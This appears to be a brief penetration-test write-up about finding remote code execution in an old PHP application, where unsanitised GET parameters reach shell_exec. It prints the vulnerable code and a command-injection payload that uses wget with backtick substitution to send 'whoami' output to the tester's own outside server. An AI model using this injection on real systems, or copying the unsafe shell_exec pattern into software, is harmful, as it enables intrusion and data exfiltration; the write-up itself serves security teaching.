A code review penetration test of an old PHP application reveled a simple RCE.
Start with a search for sensitive functions being called “shell_exec”
This is the function used by PHP to execute shell commands.
So if it is ever seen in code, it should be a focus point.
<?
phpheader("Content-Type: application/json");
if( isset($_GET["query"]) ){
$query = $_GET["query"];if( isset($_GET["customer"]) ) {
$customer = $_GET["customer"];
} else {
$customer = "default";
}
$result=shell_exec("/Admin/exeQuery.sh ".$query." ".$customer);
echo $result;
}
?>
Obviously our the $customer is our easiest attack vector since it is the last string in the command making appending easier.
Time to test!
Started with a wget to see if I could hit my own server.
notsafe.com/getData.php?query=asdf&c=;wget%20https://mysite.io/listen.php%3Fc=`whoami`If you are new to commands, note the use of the backticks around the “whoami”
This is a form of command substitution. Telling the computer to run the command and stick the result into our string.
Can read more about them here:
https://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_06_03
